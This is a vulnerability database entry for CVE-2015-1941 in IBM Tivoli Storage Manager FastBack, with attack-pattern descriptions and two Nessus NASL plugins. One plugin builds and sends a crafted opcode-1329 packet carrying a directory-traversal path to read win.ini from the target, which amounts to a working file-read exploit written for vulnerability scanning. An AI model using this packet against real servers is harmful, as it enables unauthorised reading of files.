Vulnerabilities > CVE-2015-1941 - Information Exposure vulnerability in IBM Tivoli Storage Manager Fastback
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
COMPLETE Integrity impact
NONE Availability impact
NONE Summary
The server in IBM Tivoli Storage Manager FastBack 6.1 before 6.1.12 allows remote attackers to read arbitrary files via a crafted TCP packet to an unspecified port.
Vulnerable Configurations
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Subverting Environment Variable Values The attacker directly or indirectly modifies environment variables used by or controlling the target software. The attacker's goal is to cause the target software to deviate from its expected operation in a manner that benefits the attacker.
- Footprinting An attacker engages in probing and exploration activity to identify constituents and properties of the target. Footprinting is a general term to describe a variety of information gathering techniques, often used by attackers in preparation for some attack. It consists of using tools to learn as much as possible about the composition, configuration, and security mechanisms of the targeted application, system or network. Information that might be collected during a footprinting effort could include open ports, applications and their versions, network topology, and similar information. While footprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks.
- Exploiting Trust in Client (aka Make the Client Invisible) An attack of this type exploits a programs' vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by placing themselves in the communication channel between client and server such that communication directly to the server is possible where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.
- Browser Fingerprinting An attacker carefully crafts small snippets of Java Script to efficiently detect the type of browser the potential victim is using. Many web-based attacks need prior knowledge of the web browser including the version of browser to ensure successful exploitation of a vulnerability. Having this knowledge allows an attacker to target the victim with attacks that specifically exploit known or zero day weaknesses in the type and version of the browser used by the victim. Automating this process via Java Script as a part of the same delivery system used to exploit the browser is considered more efficient as the attacker can supply a browser fingerprinting method and integrate it with exploit code, all contained in Java Script and in response to the same web page request by the browser.
- Session Credential Falsification through Prediction This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.
Nessus
NASL family General NASL id IBM_TSM_FASTBACK_SERVER_OPCODE_1329_INFO_DISCLOSURE.NASL description The IBM Tivoli Storage Manager FastBack Server running on the remote host is affected by an information disclosure vulnerability due to improper processing of opcode 1329. An unauthenticated, remote attacker can exploit this, by sending a crafted packet to TCP port 11460, to read the contents of arbitrary files. Note that the FastBack Server running on the remote host is reportedly affected by other vulnerabilities as well; however, this plugin has not tested for them. last seen 2020-06-01 modified 2020-06-02 plugin id 91502 published 2016-06-07 reporter This script is Copyright (C) 2016-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/91502 title IBM Tivoli Storage Manager FastBack Server Opcode 1329 Information Disclosure code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(91502); script_version("1.4"); script_cvs_date("Date: 2018/11/15 20:50:22"); script_cve_id("CVE-2015-1941"); script_bugtraq_id(75446); script_xref(name:"ZDI", value:"ZDI-15-268"); script_name(english:"IBM Tivoli Storage Manager FastBack Server Opcode 1329 Information Disclosure"); script_summary(english:"Attempts to read a file on the remote host."); script_set_attribute(attribute:"synopsis", value: "A remote backup service is affected by an information disclosure vulnerability."); script_set_attribute(attribute:"description", value: "The IBM Tivoli Storage Manager FastBack Server running on the remote host is affected by an information disclosure vulnerability due to improper processing of opcode 1329. An unauthenticated, remote attacker can exploit this, by sending a crafted packet to TCP port 11460, to read the contents of arbitrary files. Note that the FastBack Server running on the remote host is reportedly affected by other vulnerabilities as well; however, this plugin has not tested for them."); script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-15-268/"); # http://www-01.ibm.com/support/docview.wss?uid=swg21959398 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?bc221f52"); script_set_attribute(attribute:"solution", value: "Upgrade to IBM Tivoli Storage Manager FastBack version 6.1.12 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N"); script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available"); script_set_attribute(attribute:"exploit_available", value:"false"); script_set_attribute(attribute:"vuln_publication_date", value:"2015/05/18"); script_set_attribute(attribute:"patch_publication_date", value:"2015/07/02"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/06/07"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:ibm:tivoli_storage_manager_fastback"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"General"); script_copyright(english:"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc."); script_dependencies("ibm_tsm_fastback_detect.nbin", "os_fingerprint.nasl"); script_require_keys("IBM Tivoli Storage Manager FastBack Server", "Services/tsm-fastback"); script_require_ports(11460); exit(0); } include("byte_func.inc"); include("misc_func.inc"); include("global_settings.inc"); include("audit.inc"); include("dump.inc"); function mkdword_le() { local_var v; v = _FCT_ANON_ARGS[0]; return mkdword(v, order: BYTE_ORDER_LITTLE_ENDIAN); } function mk_pkt(opcode, p1, p2, p3) { local_var cmd_buf, cmd_hdr, pkt; if(isnull(opcode)) return NULL; if(isnull(p1)) p1 = crap(data:'P1', length:8); if(isnull(p2)) p2 = crap(data:'P2', length:8); if(isnull(p3)) p3 = crap(data:'P3', length:8); # psAgentCommand cmd_hdr = crap(data:'UNK1', length:0x8) + # ? '\x00\x00\x00\x00' + # ptr to agent obj mkdword_le(opcode) + # command opcode mkdword_le(0) + # p1 offset mkdword_le(strlen(p1)) + # p1 size mkdword_le(strlen(p1)) + # p2 offset mkdword_le(strlen(p2)) + # p2 size mkdword_le(strlen(p1) + strlen(p2)) + # p3 offset mkdword_le(strlen(p3)) + # p3 size '\x00\x00\x00\x00' + # command status '\x00\x00\x00\x00'; # ptr to psCommandBuffer # psCommandBuffer cmd_buf = p1 + p2 + p3; pkt = cmd_hdr + cmd_buf; # Append pkt len pkt = mkdword(strlen(pkt)) + pkt; return pkt; } # # MAIN # # Only Windows targets are affected. # If we cannot determine the remote OS, we still perform the check. os = get_kb_item('Host/OS'); if (!isnull(os) && 'Windows' >!< os) audit(AUDIT_OS_NOT, 'Windows'); port = get_service(svc:'tsm-fastback', default:11460, exit_on_fail:TRUE); soc = open_sock_tcp(port); if (!soc) audit(AUDIT_SOCK_FAIL, port); files = make_list('\\windows\\win.ini', '\\winnt\\win.ini'); file_pats['\\winnt\\win.ini'] = "^\[[a-zA-Z]+\]|^; for 16-bit app support"; file_pats['\\windows\\win.ini'] = "^\[[a-zA-Z]+\]|^; for 16-bit app support"; opcode = 1329; foreach file (files) { from = 0; # starting position of the byte range to retrieve to = 10000; # ending position of the byte range to retrieve chunk_loc = 0; # used for byte range locking? file_loc = 0; # used for file locking? # file path relative to C:\ProgramData\Tivoli\TSM\FastBack\server p1 = 'File: ' + '..\\..\\..\\..\\..\\..\\..\\..' + file + ' From: ' + from + ' To: ' + to + ' ChunkLoc: ' + chunk_loc + ' FileLoc: ' + file_loc; req = mk_pkt(opcode: opcode, p1: p1); send(socket:soc, data:req); res = recv(socket:soc,length: 0x4400); # Server should return something even for a non-existing file if(isnull(res)) audit(AUDIT_RESP_NOT, port); # Server should return at least 4 bytes if(strlen(res) < 4) audit(AUDIT_RESP_BAD, port, 'a request with opcode ' + opcode + ': response too short' ); # Check response pkt length if(getdword(blob:res, pos:0) != strlen(res) - 4) audit(AUDIT_RESP_BAD, port, 'a request with opcode ' + opcode + ': Invalid response packet length'); res = substr(res, 4); if (egrep(pattern:file_pats[file], string:res)) { security_report_v4( port : port, severity : SECURITY_HOLE, file : file, request : make_list(hexdump(ddata:req)), output : res, attach_type : 'text/plain' ); exit(0); } } audit(AUDIT_LISTEN_NOT_VULN,'IBM Tivoli Storage Manager FastBack Server', port);NASL family General NASL id IBM_TSM_FASTBACK_SERVER_6_1_12.NASL description The version of IBM Tivoli Storage Manager FastBack running on the remote host is 6.1.x prior to 6.1.12. It is, therefore, affected by multiple vulnerabilities : - An overflow condition exists due to improper validation of user-supplied input when handling opcode 1331. A remote, unauthenticated attacker can exploit this issue to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-1923) - An overflow condition exists due to improper validation of user-supplied input when handling opcode 1329. A remote, unauthenticated attacker can exploit this issue to cause a stack-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-1924) - An overflow condition exists due to improper validation of user-supplied input when handling opcode 1332. A remote, unauthenticated attacker can exploit this issue to cause an overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-1925) - A buffer overflow condition exists in the FXCLI_OraBR_Exec_Command() function due to improper validation of user-supplied input. A remote, unauthenticated attacker can exploit this issue, via a specially crafted packet, to cause a stack-based buffer overflow, resulting in a denial of service or the execution of arbitrary code. (CVE-2015-1929) - A buffer overflow condition exists in the JOB_S_GetJobByUserFriendlyString() function due to improper validation of user-supplied input. A remote, unauthenticated attacker can exploit this issue, via a specially crafted packet, to cause a stack-based buffer overflow, resulting in a denial of service or the execution of arbitrary code. (CVE-2015-1930) - An overflow condition exists due to improper validation of user-supplied input when handling opcode 1331. A remote, unauthenticated attacker can exploit this issue, via a specially crafted packet, to execute arbitrary commands with a system call. (CVE-2015-1938) - An unspecified flaw exists that occurs during the handling of opcode 1329. A remote, unauthenticated attacker can exploit this issue to gain access to arbitrary files. (CVE-2015-1941) - An unspecified flaw exists that occurs during the handling of opcode 1332. A remote, unauthenticated attacker can exploit this issue to write or execute arbitrary files. (CVE-2015-1942) - An overflow condition exists due to improper validation of user-supplied input when handling opcode 1364. A remote, unauthenticated attacker can exploit this issue, via a specially crafted packet, to cause a stack-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-1948) - An unspecified flaw exists that is triggered during the handling of opcode 1330. A remote, unauthenticated attacker can exploit this issue, via specially crafted packet, to execute arbitrary commands with a system call. (CVE-2015-1949) - A format string flaw exists in the vsprintf() function due to improper sanitization of user-supplied format string specifiers when processing opcode 1335. A remote, unauthenticated attacker can exploit this issue, via a specially crafted packet, to cause a denial of service condition or the execution of arbitrary code. (CVE-2015-1953) - An overflow condition exists due to improper validation of user-supplied input. A remote, unauthenticated attacker can exploit this issue to cause a stack-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-1954) - An overflow condition exists due to improper validation of user-supplied input. A remote, unauthenticated attacker can exploit this issue to cause a stack-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-1962) - An overflow condition exists due to improper validation of user-supplied input. A remote, unauthenticated attacker can exploit this issue to cause a stack-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-1963) - An overflow condition exists due to improper validation of user-supplied input. A remote, unauthenticated attacker can exploit this issue to cause a stack-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-1964) - An overflow condition exists due to improper validation of user-supplied input. A remote, unauthenticated attacker can exploit this issue to cause a stack-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-1965) - A format string flaw exists in the vsprintf() function due to improper sanitization of user-supplied format string specifiers when processing opcode 1301. A remote, unauthenticated attacker can exploit this issue, via a specially crafted packet, to cause a denial of service condition or the execution of arbitrary code. (CVE-2015-1986) - Multiple stack-based buffer overflow conditions exist due to improper bounds checking. A remote attacker can exploit these, via a crafted packet, to crash the server or execute arbitrary code with SYSTEM privileges. (CVE-2016-0212, CVE-2016-0213, CVE-2016-0216) last seen 2020-06-01 modified 2020-06-02 plugin id 84585 published 2015-07-07 reporter This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/84585 title IBM Tivoli Storage Manager FastBack 6.1.x < 6.1.12 Multiple Vulnerabilities code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(84585); script_version("1.10"); script_cvs_date("Date: 2019/11/25"); script_cve_id( "CVE-2015-1923", "CVE-2015-1924", "CVE-2015-1925", "CVE-2015-1929", "CVE-2015-1930", "CVE-2015-1938", "CVE-2015-1941", "CVE-2015-1942", "CVE-2015-1948", "CVE-2015-1949", "CVE-2015-1953", "CVE-2015-1954", "CVE-2015-1962", "CVE-2015-1963", "CVE-2015-1964", "CVE-2015-1965", "CVE-2015-1986", "CVE-2016-0212", "CVE-2016-0213", "CVE-2016-0216" ); script_bugtraq_id( 75444, 75445, 75446, 75447, 75448, 75449, 75450, 75451, 75452, 75453, 75454, 75455, 75456, 75457, 75458, 75459, 75461, 83278, 83280, 83281 ); script_name(english:"IBM Tivoli Storage Manager FastBack 6.1.x < 6.1.12 Multiple Vulnerabilities"); script_summary(english:"Checks the version of IBM TSM."); script_set_attribute(attribute:"synopsis", value: "The remote backup service is affected by multiple vulnerabilities."); script_set_attribute(attribute:"description", value: "The version of IBM Tivoli Storage Manager FastBack running on the remote host is 6.1.x prior to 6.1.12. It is, therefore, affected by multiple vulnerabilities : - An overflow condition exists due to improper validation of user-supplied input when handling opcode 1331. A remote, unauthenticated attacker can exploit this issue to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-1923) - An overflow condition exists due to improper validation of user-supplied input when handling opcode 1329. A remote, unauthenticated attacker can exploit this issue to cause a stack-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-1924) - An overflow condition exists due to improper validation of user-supplied input when handling opcode 1332. A remote, unauthenticated attacker can exploit this issue to cause an overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-1925) - A buffer overflow condition exists in the FXCLI_OraBR_Exec_Command() function due to improper validation of user-supplied input. A remote, unauthenticated attacker can exploit this issue, via a specially crafted packet, to cause a stack-based buffer overflow, resulting in a denial of service or the execution of arbitrary code. (CVE-2015-1929) - A buffer overflow condition exists in the JOB_S_GetJobByUserFriendlyString() function due to improper validation of user-supplied input. A remote, unauthenticated attacker can exploit this issue, via a specially crafted packet, to cause a stack-based buffer overflow, resulting in a denial of service or the execution of arbitrary code. (CVE-2015-1930) - An overflow condition exists due to improper validation of user-supplied input when handling opcode 1331. A remote, unauthenticated attacker can exploit this issue, via a specially crafted packet, to execute arbitrary commands with a system call. (CVE-2015-1938) - An unspecified flaw exists that occurs during the handling of opcode 1329. A remote, unauthenticated attacker can exploit this issue to gain access to arbitrary files. (CVE-2015-1941) - An unspecified flaw exists that occurs during the handling of opcode 1332. A remote, unauthenticated attacker can exploit this issue to write or execute arbitrary files. (CVE-2015-1942) - An overflow condition exists due to improper validation of user-supplied input when handling opcode 1364. A remote, unauthenticated attacker can exploit this issue, via a specially crafted packet, to cause a stack-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-1948) - An unspecified flaw exists that is triggered during the handling of opcode 1330. A remote, unauthenticated attacker can exploit this issue, via specially crafted packet, to execute arbitrary commands with a system call. (CVE-2015-1949) - A format string flaw exists in the vsprintf() function due to improper sanitization of user-supplied format string specifiers when processing opcode 1335. A remote, unauthenticated attacker can exploit this issue, via a specially crafted packet, to cause a denial of service condition or the execution of arbitrary code. (CVE-2015-1953) - An overflow condition exists due to improper validation of user-supplied input. A remote, unauthenticated attacker can exploit this issue to cause a stack-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-1954) - An overflow condition exists due to improper validation of user-supplied input. A remote, unauthenticated attacker can exploit this issue to cause a stack-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-1962) - An overflow condition exists due to improper validation of user-supplied input. A remote, unauthenticated attacker can exploit this issue to cause a stack-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-1963) - An overflow condition exists due to improper validation of user-supplied input. A remote, unauthenticated attacker can exploit this issue to cause a stack-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-1964) - An overflow condition exists due to improper validation of user-supplied input. A remote, unauthenticated attacker can exploit this issue to cause a stack-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-1965) - A format string flaw exists in the vsprintf() function due to improper sanitization of user-supplied format string specifiers when processing opcode 1301. A remote, unauthenticated attacker can exploit this issue, via a specially crafted packet, to cause a denial of service condition or the execution of arbitrary code. (CVE-2015-1986) - Multiple stack-based buffer overflow conditions exist due to improper bounds checking. A remote attacker can exploit these, via a crafted packet, to crash the server or execute arbitrary code with SYSTEM privileges. (CVE-2016-0212, CVE-2016-0213, CVE-2016-0216)"); # http://www-01.ibm.com/support/docview.wss?uid=swg21959398 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?bc221f52"); # http://www-01.ibm.com/support/docview.wss?uid=swg21975358 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?5833512d"); script_set_attribute(attribute:"solution", value: "Upgrade to IBM Tivoli Storage Manager FastBack version 6.1.12 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2016-0216"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2015/05/18"); script_set_attribute(attribute:"patch_publication_date", value:"2015/07/02"); script_set_attribute(attribute:"plugin_publication_date", value:"2015/07/07"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:ibm:tivoli_storage_manager_fastback"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"General"); script_copyright(english:"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("ibm_tsm_fastback_detect.nbin", "os_fingerprint.nasl"); script_require_keys("IBM Tivoli Storage Manager FastBack Server", "Services/tsm-fastback"); exit(0); } include("global_settings.inc"); include("misc_func.inc"); include("audit.inc"); port = get_service(svc:"tsm-fastback", default:11460, ipproto:"tcp", exit_on_fail:TRUE); app_name = "IBM Tivoli Storage Manager FastBack Server"; version = get_kb_item_or_exit(app_name + "/" + port + "/version"); if (version == "unknown") audit(AUDIT_UNKNOWN_APP_VER, app_name); # We only care about 6.1 specifically. if (version !~ "^6\.1(\.|$)") audit(AUDIT_NOT_LISTEN, app_name +" 6.1", port); os = get_kb_item("Host/OS"); # Only Windows targets are affected. if (!isnull(os) && "Windows" >!< os) audit(AUDIT_OS_NOT, 'Windows'); # If we cant determine the OS and we don't have paranoia on we do not continue # this is probably a version so old it does not matter for these checks anyway if (isnull(os) && report_paranoia < 2) audit(AUDIT_OS_NOT, "determinable."); # Check for fixed version fix = "6.1.12"; if (ver_compare(ver:version,fix:fix,strict:FALSE) < 0) { report = '\n Product : ' + app_name + '\n Port : ' + port + '\n Installed version : ' + version + '\n Fixed version : ' + fix + '\n'; security_report_v4(port:port, extra:report, severity:SECURITY_HOLE); exit(0); } else audit(AUDIT_LISTEN_NOT_VULN, app_name, port, version);